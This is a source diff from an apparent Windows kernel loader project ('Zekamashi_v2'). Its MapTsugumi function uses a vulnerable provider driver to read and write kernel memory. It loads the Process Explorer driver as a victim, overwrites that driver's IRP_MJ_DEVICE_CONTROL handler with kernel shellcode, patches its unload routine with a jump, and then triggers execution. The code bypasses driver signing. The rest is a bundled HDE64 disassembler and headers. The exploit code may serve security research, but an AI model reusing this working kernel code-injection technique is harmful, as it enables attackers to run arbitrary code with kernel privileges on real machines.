+ ASSERT_RESOLVED_FUNC(g_MappedData->MmUnmapLockedPages);
+
+ g_MappedData->MmUnlockPages =
+ ResolveFunction(KernelBase, KernelImage, "MmUnlockPages");
+ ASSERT_RESOLVED_FUNC(g_MappedData->MmUnlockPages);
+
+ g_MappedData->MmProbeAndLockPages =
+ ResolveFunction(KernelBase, KernelImage, "MmProbeAndLockPages");
+ ASSERT_RESOLVED_FUNC(g_MappedData->MmProbeAndLockPages);
+
+ g_MappedData->MmMapLockedPagesSpecifyCache =
+ ResolveFunction(KernelBase, KernelImage, "MmMapLockedPagesSpecifyCache");
+ ASSERT_RESOLVED_FUNC(g_MappedData->MmMapLockedPagesSpecifyCache);
+
+ g_MappedData->KeDelayExecutionThread =
+ ResolveFunction(KernelBase, KernelImage, "KeDelayExecutionThread");
+ ASSERT_RESOLVED_FUNC(g_MappedData->KeDelayExecutionThread);
+
+ g_MappedData->PsRemoveLoadImageNotifyRoutine =
+ ResolveFunction(KernelBase, KernelImage, "PsRemoveLoadImageNotifyRoutine");
+ ASSERT_RESOLVED_FUNC(g_MappedData->PsRemoveLoadImageNotifyRoutine);
+
+ g_MappedData->IoDeleteSymbolicLink =
+ ResolveFunction(KernelBase, KernelImage, "IoDeleteSymbolicLink");
+ ASSERT_RESOLVED_FUNC(g_MappedData->IoDeleteSymbolicLink);
+
+ g_MappedData->IoDeleteDevice =
+ ResolveFunction(KernelBase, KernelImage, "IoDeleteDevice");
+ ASSERT_RESOLVED_FUNC(g_MappedData->IoDeleteDevice);
+
+ g_MappedData->RtlInitUnicodeString =
+ ResolveFunction(KernelBase, KernelImage, "RtlInitUnicodeString");
+ ASSERT_RESOLVED_FUNC(g_MappedData->RtlInitUnicodeString);
+
+ g_MappedData->ConfigurationDataSize = ConfigurationData->DDTableSize;
+ RtlCopyMemory(&g_MappedData->ConfigurationData,
+ ConfigurationData->DDTablePointer,
+ ConfigurationData->DDTableSize);
+
+ bResult = TRUE;
+
+ } while (FALSE);
+
+ printf_s("[<] Leaving %s\r\n", __FUNCTION__);
+
+ return bResult;
+}
+
+/*
+* MapTsugumi
+*
+* Purpose:
+*
+* Load and run shellcode inside victim driver using vulnerable driver.
+*
+*/
+BOOL MapTsugumi(
+ _In_ PTABLE_DESC ConfigurationData
+)
+{
+ BOOL bResult = FALSE, bSuccess = FALSE;
+ ULONG_PTR objectAddress, IRPHandlerAddress = 0, DataSectionAddress = 0;
+ HANDLE providerHandle = NULL;
+ HANDLE victimHandle = NULL;
+ HINSTANCE hInstance = GetModuleHandle(NULL);
+ LPWSTR driverFileName = NULL;
+
+ PIMAGE_DOS_HEADER hdrDriver = NULL;
+ PIMAGE_NT_HEADERS64 pehdr;
+ PIMAGE_SECTION_HEADER sections;
+ ULONG c;
+ LONG32 JMP_Offset;
+ BYTE JMP_Instruction[16] = {
+ 0xe9, 0, 0, 0, 0, 0xcc, 0xcc, 0xcc,
+ 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc
+ };
+
+ printf_s("[>] Entering %s\r\n", __FUNCTION__);
+
+ if (!ProviderCreate(&providerHandle, &driverFileName)) {
+ printf_s("[!] ProviderCreate failed, abort\r\n");
+ return FALSE;
+ }
+
+ ULONG retryCount = 1, maxRetry = 3;
+
+ FILE_OBJECT fileObject;
+ DEVICE_OBJECT deviceObject;
+ DRIVER_OBJECT driverObject;
+
+Reload:
+
+ printf_s("LDR: Victim driver map attempt %lu of %lu\r\n", retryCount, maxRetry);
+ RtlSecureZeroMemory(&driverObject, sizeof(driverObject));
+
+ //
+ // If this is reload, release victim.
+ //
+ if (victimHandle) {
+ NtClose(victimHandle);
+ victimHandle = NULL;
+ VictimRelease((LPWSTR)PROCEXP152);
+ }
+
+ if (VictimCreate(hInstance,
+ (LPWSTR)PROCEXP152,
+ IDR_PROCEXP,
+ &victimHandle))
+ {
+ printf_s("LDR: Victim driver loaded, handle 0x%p\r\n", victimHandle);
+ }
+ else {
+ printf_s("LDR: Could not load victim driver, GetLastError %lu\r\n", GetLastError());
+ }
+
+ if (supQueryObjectFromHandle(victimHandle, &objectAddress)) {
+
+ do {
+
+ RtlSecureZeroMemory(&fileObject, sizeof(fileObject));
+
+ printf_s("LDR: Reading FILE_OBJECT at 0x%llX\r\n", objectAddress);
+
+ if (!ReadKernelVM(providerHandle,
+ objectAddress,
+ &fileObject,
+ sizeof(FILE_OBJECT)))
+ {
+ printf_s("[!] Could not read FILE_OBJECT at 0x%llX\r\n", objectAddress);
+ break;
+ }
+
+ printf_s("LDR: Reading DEVICE_OBJECT at 0x%p\r\n", fileObject.DeviceObject);
+
+ RtlSecureZeroMemory(&deviceObject, sizeof(deviceObject));
+
+ if (!ReadKernelVM(providerHandle,
+ (ULONG_PTR)fileObject.DeviceObject,
+ &deviceObject,
+ sizeof(DEVICE_OBJECT)))
+ {
+ printf_s("[!] Could not read DEVICE_OBJECT at 0x%p\r\n", fileObject.DeviceObject);
+ break;
+ }
+
+ printf_s("LDR: Reading DRIVER_OBJECT at 0x%p\r\n", deviceObject.DriverObject);
+
+ if (!ReadKernelVM(providerHandle,
+ (ULONG_PTR)deviceObject.DriverObject,
+ &driverObject,
+ sizeof(DRIVER_OBJECT)))
+ {
+ printf_s("[!] Could not read DRIVER_OBJECT at 0x%p\r\n", deviceObject.DriverObject);
+ break;
+ }
+
+ hdrDriver = VirtualAlloc(NULL, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ if (!hdrDriver) {
+ printf_s("[!] Memory allocation error, GetLastError %lu.\r\n", GetLastError());
+ break;
+ }
+
+ if (!ReadKernelVM(providerHandle,
+ (ULONG_PTR)driverObject.DriverStart,
+ hdrDriver,
+ PAGE_SIZE))
+ {
+ printf_s("[!] Could not read driver image header at 0x%p\r\n", driverObject.DriverStart);
+ break;
+ }
+
+ pehdr = (PIMAGE_NT_HEADERS64)((ULONG_PTR)hdrDriver + hdrDriver->e_lfanew);
+ sections = (PIMAGE_SECTION_HEADER)((ULONG_PTR)&pehdr->FileHeader +
+ sizeof(IMAGE_FILE_HEADER) + pehdr->FileHeader.SizeOfOptionalHeader);
+
+ for (c = 0; c < pehdr->FileHeader.NumberOfSections; ++c)
+ {
+ if (_strcmp_a((const char*)sections[c].Name, ".data") == 0)
+ {
+ DataSectionAddress = sections[c].VirtualAddress + (ULONG_PTR)driverObject.DriverStart;
+ }
+ }
+
+ if (!DataSectionAddress) {
+ printf_s("[!] Could not find data section\r\n");
+ break;
+ }
+ else {
+ printf_s("LDR: Victim data section %llX\r\n", DataSectionAddress);
+ }
+
+ // fixing data pointers in the shellcode
+
+ for (c = 0; c < sizeof(x64kernelcode) - sizeof(ULONG64); ++c)
+ {
+ if (*(PULONG64)&x64kernelcode[c] == 0x1337C0DE1CEDC01Aull)
+ {
+ *(PULONG64)&x64kernelcode[c] = DataSectionAddress;
+ }
+ }
+
+ //
+ // ProcExp handle no longer needed, can be closed.
+ //
+ CloseHandle(victimHandle);
+ victimHandle = NULL;
+
+ IRPHandlerAddress = (ULONG_PTR)driverObject.MajorFunction[IRP_MJ_DEVICE_CONTROL];
+
+ //
+ // Check memory layout.
+ //
+ if (!CheckMemoryLayout(providerHandle, IRPHandlerAddress, sizeof(x64kernelcode))) {
+
+ printf_s("[!] Physical address is not within same/next page, reload victim driver\r\n");
+ retryCount += 1;
+ if (retryCount > maxRetry) {
+ printf_s("[!] Too many reloads, abort\r\n");
+ break;
+ }
+ goto Reload;
+
+ }
+
+ printf_s("LDR: Victim IRP_MJ_DEVICE_CONTROL 0x%llX\r\n", IRPHandlerAddress);
+ printf_s("LDR: Victim DriverUnload 0x%p\r\n", driverObject.DriverUnload);
+
+ bSuccess = TRUE;
+
+ } while (FALSE);
+
+ if (hdrDriver)
+ VirtualFree(hdrDriver, 0, MEM_RELEASE);
+ }
+
+ //
+ // Ensure ProcExp handle is closed.
+ //
+ if (victimHandle) {
+ NtClose(victimHandle);
+ victimHandle = NULL;
+ }
+
+ //
+ // Victim loaded successfully.
+ //
+ if (bSuccess) {
+
+ if (SetupShellCode(ConfigurationData)) {
+
+ //
+ // Write shellcode to driver.
+ //
+ ULONG UnloadRoutineOffset = QueryDriverUnloadOffset(x64kernelcode, sizeof(x64kernelcode));
+
+ if (UnloadRoutineOffset) {
+
+ JMP_Offset = (LONG32)(IRPHandlerAddress + UnloadRoutineOffset - (ULONG_PTR)driverObject.DriverUnload - 5);
+ *(PLONG32)(&JMP_Instruction[1]) = JMP_Offset;
+ bSuccess = WriteKernelVM(providerHandle, DataSectionAddress, g_MappedData, sizeof(MAPPED_CODE_DATA));
+ bSuccess &= WriteKernelVM(providerHandle, IRPHandlerAddress, x64kernelcode, sizeof(x64kernelcode));
+ bSuccess &= WriteKernelVM(providerHandle, (ULONG_PTR)driverObject.DriverUnload, JMP_Instruction, sizeof(JMP_Instruction));
+ if (bSuccess)
+ {
+ printf_s("LDR: Driver IRP_MJ_DEVICE_CONTROL handler code modified\r\n");
+
+ //
+ // Run shellcode.
+ // Target has the same handlers for IRP_MJ_CREATE/CLOSE/DEVICE_CONTROL
+ //
+ printf_s("LDR: Run shellcode\r\n");
+ Sleep(1000);
+ supOpenDriver((LPWSTR)PROCEXP152, &victimHandle);
+ Sleep(1000);
+ bResult = TRUE;
+ }
+ else
+ {
+ printf_s("[!] Error writing shell code to the target driver, abort\r\n");
+ }
+ }
+ else {
+ printf_s("[!] Error calculating shellcode DriverUnload offset\r\n");
+ }
+ }
+ else {
+ printf_s("[!] Error while building shellcode, abort\r\n");
+ }
+ }
+
+ ProviderRelease(providerHandle, driverFileName);
+
+ /*
+
+ //
+ // Unload procexp victim. Used only while debugging.
+ //
+ if (VictimRelease((LPWSTR)PROCEXP152)) {
+ printf_s("LDR: Victim driver unloaded\r\n");
+ }
+
+ */
+ printf_s("[<] Leaving %s\r\n", __FUNCTION__);
+
+ return bResult;
+}
diff --git a/Source/Zekamashi_v2/loader/drvmap.h b/Source/Zekamashi_v2/loader/drvmap.h
new file mode 100644
index 0000000..71a336a
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/drvmap.h
@@ -0,0 +1,52 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2020
+*
+* TITLE: DRVMAP.H
+*
+* VERSION: 1.00
+*
+* DATE: 24 Jan 2020
+*
+* Prototypes and definitions for driver mapping.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+#define MAX_CONFIGURATION_DATA_SIZE 1024
+
+typedef struct _MAPPED_CODE_DATA {
+ // Lock
+ ULONG fInititialized;
+ LONG iNotifyCounter;
+
+ // API pointers
+ PVOID _wcsnicmp;
+ PVOID IoAllocateMdl;
+ PVOID IofCompleteRequest;
+ PVOID IoFreeMdl;
+ PVOID IoDeleteDevice;
+ PVOID IoDeleteSymbolicLink;
+ PVOID KeDelayExecutionThread;
+ PVOID PsGetCurrentProcessId;
+ PVOID PsSetLoadImageNotifyRoutine;
+ PVOID PsRemoveLoadImageNotifyRoutine;
+ PVOID MmProtectMdlSystemAddress;
+ PVOID MmUnmapLockedPages;
+ PVOID MmUnlockPages;
+ PVOID MmProbeAndLockPages;
+ PVOID MmMapLockedPagesSpecifyCache;
+ PVOID RtlInitUnicodeString;
+
+ // data
+ ULONG ConfigurationDataSize;
+ UCHAR ConfigurationData[MAX_CONFIGURATION_DATA_SIZE];
+} MAPPED_CODE_DATA, * PMAPPED_CODE_DATA;
+
+BOOL MapTsugumi(
+ _In_ PTABLE_DESC ConfigurationData);
diff --git a/Source/Kasumi/VBoxPatchGen/global.h b/Source/Zekamashi_v2/loader/global.h
similarity index 51%
rename from Source/Kasumi/VBoxPatchGen/global.h
rename to Source/Zekamashi_v2/loader/global.h
index e180193..998f299 100644
--- a/Source/Kasumi/VBoxPatchGen/global.h
+++ b/Source/Zekamashi_v2/loader/global.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2017 - 2019
+* (C) COPYRIGHT AUTHORS, 2014 - 2020
*
* TITLE: GLOBAL.H
*
-* VERSION: 1.20
+* VERSION: 2.00
*
-* DATE: 04 Jan 2019
+* DATE: 24 Jan 2020
*
* Common header file for the program support routines.
*
@@ -19,39 +19,32 @@
//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
+#pragma warning(disable: 6320) // Exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER.
#if !defined UNICODE
#error ANSI build is not supported
#endif
-#if defined (_MSC_VER)
-#if (_MSC_VER >= 1900) //VS15, 17 etc
-#ifdef _DEBUG
-#pragma comment(lib, "vcruntimed.lib")
-#pragma comment(lib, "ucrtd.lib")
-#else
-#pragma comment(lib, "libucrt.lib")
-#pragma comment(lib, "libvcruntime.lib")
-#endif
-#endif
-#endif
-
#include
+#include
#include
-#include "ntos.h"
-#include "minirtl\minirtl.h"
-#include "minirtl\cmdline.h"
-#include "cui.h"
+#include "ntdll/ntos.h"
+
+#define _NTDEF_
+#include
+#undef _NTDEF_
+
+#include "resource.h"
+#include "minirtl/minirtl.h"
+#include "minirtl/cmdline.h"
+#include "hde/hde64.h"
#include "patterns.h"
+#include "consts.h"
+#include "sup.h"
+#include "idrv/nal.h"
+#include "victim.h"
+#include "drvmap.h"
-typedef struct _BINARY_PATCH_BLOCK {
- ULONG VirtualOffset;
- UCHAR DataLength;
- UCHAR Data[1];
-} BINARY_PATCH_BLOCK, *PBINARY_PATCH_BLOCK;
+#define T_PRNTDEFAULT "%s\r\n"
-typedef struct _BINARY_PATCH_BLOCK_INTERNAL {
- ULONG VirtualOffset;
- UCHAR DataLength;
- UCHAR Data[32];
-} BINARY_PATCH_BLOCK_INTERNAL, *PBINARY_PATCH_BLOCK_INTERNAL;
+extern ULONG_PTR g_MaximumUserModeAddress;
diff --git a/Source/Zekamashi_v2/loader/hde/hde64.c b/Source/Zekamashi_v2/loader/hde/hde64.c
new file mode 100644
index 0000000..76e8a51
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/hde/hde64.c
@@ -0,0 +1,338 @@
+/*
+ * Hacker Disassembler Engine 64 C
+ * Copyright (c) 2008-2009, Vyacheslav Patkov.
+ * All rights reserved.
+ *
+ */
+
+#include "hde64.h"
+#include "table64.h"
+
+#pragma warning(push)
+#pragma warning(disable:4701)
+#pragma warning(disable:4706)
+
+unsigned int hde64_disasm(const void *code, hde64s *hs)
+{
+ uint8_t x, c = 0, *p = (uint8_t *)code, cflags, opcode, pref = 0;
+ uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0;
+ uint8_t op64 = 0;
+
+ // Avoid using memset to reduce the footprint.
+#ifndef _MSC_VER
+ memset((LPBYTE)hs, 0, sizeof(hde64s));
+#else
+ __stosb((LPBYTE)hs, 0, sizeof(hde64s));
+#endif
+
+ for (x = 16; x; x--)
+ switch (c = *p++) {
+ case 0xf3:
+ hs->p_rep = c;
+ pref |= PRE_F3;
+ break;
+ case 0xf2:
+ hs->p_rep = c;
+ pref |= PRE_F2;
+ break;
+ case 0xf0:
+ hs->p_lock = c;
+ pref |= PRE_LOCK;
+ break;
+ case 0x26: case 0x2e: case 0x36:
+ case 0x3e: case 0x64: case 0x65:
+ hs->p_seg = c;
+ pref |= PRE_SEG;
+ break;
+ case 0x66:
+ hs->p_66 = c;
+ pref |= PRE_66;
+ break;
+ case 0x67:
+ hs->p_67 = c;
+ pref |= PRE_67;
+ break;
+ default:
+ goto pref_done;
+ }
+ pref_done:
+
+ hs->flags = (uint32_t)pref << 23;
+
+ if (!pref)
+ pref |= PRE_NONE;
+
+ if ((c & 0xf0) == 0x40) {
+ hs->flags |= F_PREFIX_REX;
+ if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8)
+ op64++;
+ hs->rex_r = (c & 7) >> 2;
+ hs->rex_x = (c & 3) >> 1;
+ hs->rex_b = c & 1;
+ if (((c = *p++) & 0xf0) == 0x40) {
+ opcode = c;
+ goto error_opcode;
+ }
+ }
+
+ if ((hs->opcode = c) == 0x0f) {
+ hs->opcode2 = c = *p++;
+ ht += DELTA_OPCODES;
+ } else if (c >= 0xa0 && c <= 0xa3) {
+ op64++;
+ if (pref & PRE_67)
+ pref |= PRE_66;
+ else
+ pref &= ~PRE_66;
+ }
+
+ opcode = c;
+ cflags = ht[ht[opcode / 4] + (opcode % 4)];
+
+ if (cflags == C_ERROR) {
+ error_opcode:
+ hs->flags |= F_ERROR | F_ERROR_OPCODE;
+ cflags = 0;
+ if ((opcode & -3) == 0x24)
+ cflags++;
+ }
+
+ x = 0;
+ if (cflags & C_GROUP) {
+ uint16_t t;
+ t = *(uint16_t *)(ht + (cflags & 0x7f));
+ cflags = (uint8_t)t;
+ x = (uint8_t)(t >> 8);
+ }
+
+ if (hs->opcode2) {
+ ht = hde64_table + DELTA_PREFIXES;
+ if (ht[ht[opcode / 4] + (opcode % 4)] & pref)
+ hs->flags |= F_ERROR | F_ERROR_OPCODE;
+ }
+
+ if (cflags & C_MODRM) {
+ hs->flags |= F_MODRM;
+ hs->modrm = c = *p++;
+ hs->modrm_mod = m_mod = c >> 6;
+ hs->modrm_rm = m_rm = c & 7;
+ hs->modrm_reg = m_reg = (c & 0x3f) >> 3;
+
+ if (x && ((x << m_reg) & 0x80))
+ hs->flags |= F_ERROR | F_ERROR_OPCODE;
+
+ if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) {
+ uint8_t t = opcode - 0xd9;
+ if (m_mod == 3) {
+ ht = hde64_table + DELTA_FPU_MODRM + t*8;
+ t = ht[m_reg] << m_rm;
+ } else {
+ ht = hde64_table + DELTA_FPU_REG;
+ t = ht[t] << m_reg;
+ }
+ if (t & 0x80)
+ hs->flags |= F_ERROR | F_ERROR_OPCODE;
+ }
+
+ if (pref & PRE_LOCK) {
+ if (m_mod == 3) {
+ hs->flags |= F_ERROR | F_ERROR_LOCK;
+ } else {
+ uint8_t *table_end, op = opcode;
+ if (hs->opcode2) {
+ ht = hde64_table + DELTA_OP2_LOCK_OK;
+ table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK;
+ } else {
+ ht = hde64_table + DELTA_OP_LOCK_OK;
+ table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK;
+ op &= -2;
+ }
+ for (; ht != table_end; ht++)
+ if (*ht++ == op) {
+ if (!((*ht << m_reg) & 0x80))
+ goto no_lock_error;
+ else
+ break;
+ }
+ hs->flags |= F_ERROR | F_ERROR_LOCK;
+ no_lock_error:
+ ;
+ }
+ }
+
+ if (hs->opcode2) {
+ switch (opcode) {
+ case 0x20: case 0x22:
+ m_mod = 3;
+ if (m_reg > 4 || m_reg == 1)
+ goto error_operand;
+ else
+ goto no_error_operand;
+ case 0x21: case 0x23:
+ m_mod = 3;
+ if (m_reg == 4 || m_reg == 5)
+ goto error_operand;
+ else
+ goto no_error_operand;
+ }
+ } else {
+ switch (opcode) {
+ case 0x8c:
+ if (m_reg > 5)
+ goto error_operand;
+ else
+ goto no_error_operand;
+ case 0x8e:
+ if (m_reg == 1 || m_reg > 5)
+ goto error_operand;
+ else
+ goto no_error_operand;
+ }
+ }
+
+ if (m_mod == 3) {
+ uint8_t *table_end;
+ if (hs->opcode2) {
+ ht = hde64_table + DELTA_OP2_ONLY_MEM;
+ table_end = ht + sizeof(hde64_table) - DELTA_OP2_ONLY_MEM;
+ } else {
+ ht = hde64_table + DELTA_OP_ONLY_MEM;
+ table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM;
+ }
+ for (; ht != table_end; ht += 2)
+ if (*ht++ == opcode) {
+ if (*ht++ & pref && !((*ht << m_reg) & 0x80))
+ goto error_operand;
+ else
+ break;
+ }
+ goto no_error_operand;
+ } else if (hs->opcode2) {
+ switch (opcode) {
+ case 0x50: case 0xd7: case 0xf7:
+ if (pref & (PRE_NONE | PRE_66))
+ goto error_operand;
+ break;
+ case 0xd6:
+ if (pref & (PRE_F2 | PRE_F3))
+ goto error_operand;
+ break;
+ case 0xc5:
+ goto error_operand;
+ }
+ goto no_error_operand;
+ } else
+ goto no_error_operand;
+
+ error_operand:
+ hs->flags |= F_ERROR | F_ERROR_OPERAND;
+ no_error_operand:
+
+ c = *p++;
+ if (m_reg <= 1) {
+ if (opcode == 0xf6)
+ cflags |= C_IMM8;
+ else if (opcode == 0xf7)
+ cflags |= C_IMM_P66;
+ }
+
+ switch (m_mod) {
+ case 0:
+ if (pref & PRE_67) {
+ if (m_rm == 6)
+ disp_size = 2;
+ } else
+ if (m_rm == 5)
+ disp_size = 4;
+ break;
+ case 1:
+ disp_size = 1;
+ break;
+ case 2:
+ disp_size = 2;
+ if (!(pref & PRE_67))
+ disp_size <<= 1;
+ }
+
+ if (m_mod != 3 && m_rm == 4) {
+ hs->flags |= F_SIB;
+ p++;
+ hs->sib = c;
+ hs->sib_scale = c >> 6;
+ hs->sib_index = (c & 0x3f) >> 3;
+ if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1))
+ disp_size = 4;
+ }
+
+ p--;
+ switch (disp_size) {
+ case 1:
+ hs->flags |= F_DISP8;
+ hs->disp.disp8 = *p;
+ break;
+ case 2:
+ hs->flags |= F_DISP16;
+ hs->disp.disp16 = *(uint16_t *)p;
+ break;
+ case 4:
+ hs->flags |= F_DISP32;
+ hs->disp.disp32 = *(uint32_t *)p;
+ }
+ p += disp_size;
+ } else if (pref & PRE_LOCK)
+ hs->flags |= F_ERROR | F_ERROR_LOCK;
+
+ if (cflags & C_IMM_P66) {
+ if (cflags & C_REL32) {
+ if (pref & PRE_66) {
+ hs->flags |= F_IMM16 | F_RELATIVE;
+ hs->imm.imm16 = *(uint16_t *)p;
+ p += 2;
+ goto disasm_done;
+ }
+ goto rel32_ok;
+ }
+ if (op64) {
+ hs->flags |= F_IMM64;
+ hs->imm.imm64 = *(uint64_t *)p;
+ p += 8;
+ } else if (!(pref & PRE_66)) {
+ hs->flags |= F_IMM32;
+ hs->imm.imm32 = *(uint32_t *)p;
+ p += 4;
+ } else
+ goto imm16_ok;
+ }
+
+
+ if (cflags & C_IMM16) {
+ imm16_ok:
+ hs->flags |= F_IMM16;
+ hs->imm.imm16 = *(uint16_t *)p;
+ p += 2;
+ }
+ if (cflags & C_IMM8) {
+ hs->flags |= F_IMM8;
+ hs->imm.imm8 = *p++;
+ }
+
+ if (cflags & C_REL32) {
+ rel32_ok:
+ hs->flags |= F_IMM32 | F_RELATIVE;
+ hs->imm.imm32 = *(uint32_t *)p;
+ p += 4;
+ } else if (cflags & C_REL8) {
+ hs->flags |= F_IMM8 | F_RELATIVE;
+ hs->imm.imm8 = *p++;
+ }
+
+ disasm_done:
+
+ if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) {
+ hs->flags |= F_ERROR | F_ERROR_LENGTH;
+ hs->len = 15;
+ }
+
+ return (unsigned int)hs->len;
+}
+#pragma warning(pop)
diff --git a/Source/Zekamashi_v2/loader/hde/hde64.h b/Source/Zekamashi_v2/loader/hde/hde64.h
new file mode 100644
index 0000000..ecbf4df
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/hde/hde64.h
@@ -0,0 +1,112 @@
+/*
+ * Hacker Disassembler Engine 64
+ * Copyright (c) 2008-2009, Vyacheslav Patkov.
+ * All rights reserved.
+ *
+ * hde64.h: C/C++ header file
+ *
+ */
+
+#ifndef _HDE64_H_
+#define _HDE64_H_
+
+/* stdint.h - C99 standard header
+ * http://en.wikipedia.org/wiki/stdint.h
+ *
+ * if your compiler doesn't contain "stdint.h" header (for
+ * example, Microsoft Visual C++), you can download file:
+ * http://www.azillionmonkeys.com/qed/pstdint.h
+ * and change next line to:
+ * #include "pstdint.h"
+ */
+#include "pstdint.h"
+
+#define F_MODRM 0x00000001
+#define F_SIB 0x00000002
+#define F_IMM8 0x00000004
+#define F_IMM16 0x00000008
+#define F_IMM32 0x00000010
+#define F_IMM64 0x00000020
+#define F_DISP8 0x00000040
+#define F_DISP16 0x00000080
+#define F_DISP32 0x00000100
+#define F_RELATIVE 0x00000200
+#define F_ERROR 0x00001000
+#define F_ERROR_OPCODE 0x00002000
+#define F_ERROR_LENGTH 0x00004000
+#define F_ERROR_LOCK 0x00008000
+#define F_ERROR_OPERAND 0x00010000
+#define F_PREFIX_REPNZ 0x01000000
+#define F_PREFIX_REPX 0x02000000
+#define F_PREFIX_REP 0x03000000
+#define F_PREFIX_66 0x04000000
+#define F_PREFIX_67 0x08000000
+#define F_PREFIX_LOCK 0x10000000
+#define F_PREFIX_SEG 0x20000000
+#define F_PREFIX_REX 0x40000000
+#define F_PREFIX_ANY 0x7f000000
+
+#define PREFIX_SEGMENT_CS 0x2e
+#define PREFIX_SEGMENT_SS 0x36
+#define PREFIX_SEGMENT_DS 0x3e
+#define PREFIX_SEGMENT_ES 0x26
+#define PREFIX_SEGMENT_FS 0x64
+#define PREFIX_SEGMENT_GS 0x65
+#define PREFIX_LOCK 0xf0
+#define PREFIX_REPNZ 0xf2
+#define PREFIX_REPX 0xf3
+#define PREFIX_OPERAND_SIZE 0x66
+#define PREFIX_ADDRESS_SIZE 0x67
+
+#pragma pack(push,1)
+
+typedef struct {
+ uint8_t len;
+ uint8_t p_rep;
+ uint8_t p_lock;
+ uint8_t p_seg;
+ uint8_t p_66;
+ uint8_t p_67;
+ uint8_t rex;
+ uint8_t rex_w;
+ uint8_t rex_r;
+ uint8_t rex_x;
+ uint8_t rex_b;
+ uint8_t opcode;
+ uint8_t opcode2;
+ uint8_t modrm;
+ uint8_t modrm_mod;
+ uint8_t modrm_reg;
+ uint8_t modrm_rm;
+ uint8_t sib;
+ uint8_t sib_scale;
+ uint8_t sib_index;
+ uint8_t sib_base;
+ union {
+ uint8_t imm8;
+ uint16_t imm16;
+ uint32_t imm32;
+ uint64_t imm64;
+ } imm;
+ union {
+ uint8_t disp8;
+ uint16_t disp16;
+ uint32_t disp32;
+ } disp;
+ uint32_t flags;
+} hde64s;
+
+#pragma pack(pop)
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+/* __cdecl */
+unsigned int hde64_disasm(const void *code, hde64s *hs);
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif /* _HDE64_H_ */
diff --git a/Source/Zekamashi_v2/loader/hde/pstdint.h b/Source/Zekamashi_v2/loader/hde/pstdint.h
new file mode 100644
index 0000000..5b7c5f0
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/hde/pstdint.h
@@ -0,0 +1,39 @@
+/*
+ * MinHook - The Minimalistic API Hooking Library for x64/x86
+ * Copyright (C) 2009-2015 Tsuda Kageyu. All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
+ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
+ * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
+ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#pragma once
+
+#include
+
+// Integer types for HDE.
+typedef INT8 int8_t;
+typedef INT16 int16_t;
+typedef INT32 int32_t;
+typedef INT64 int64_t;
+typedef UINT8 uint8_t;
+typedef UINT16 uint16_t;
+typedef UINT32 uint32_t;
+typedef UINT64 uint64_t;
diff --git a/Source/Zekamashi_v2/loader/hde/table64.h b/Source/Zekamashi_v2/loader/hde/table64.h
new file mode 100644
index 0000000..01d4541
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/hde/table64.h
@@ -0,0 +1,74 @@
+/*
+ * Hacker Disassembler Engine 64 C
+ * Copyright (c) 2008-2009, Vyacheslav Patkov.
+ * All rights reserved.
+ *
+ */
+
+#define C_NONE 0x00
+#define C_MODRM 0x01
+#define C_IMM8 0x02
+#define C_IMM16 0x04
+#define C_IMM_P66 0x10
+#define C_REL8 0x20
+#define C_REL32 0x40
+#define C_GROUP 0x80
+#define C_ERROR 0xff
+
+#define PRE_ANY 0x00
+#define PRE_NONE 0x01
+#define PRE_F2 0x02
+#define PRE_F3 0x04
+#define PRE_66 0x08
+#define PRE_67 0x10
+#define PRE_LOCK 0x20
+#define PRE_SEG 0x40
+#define PRE_ALL 0xff
+
+#define DELTA_OPCODES 0x4a
+#define DELTA_FPU_REG 0xfd
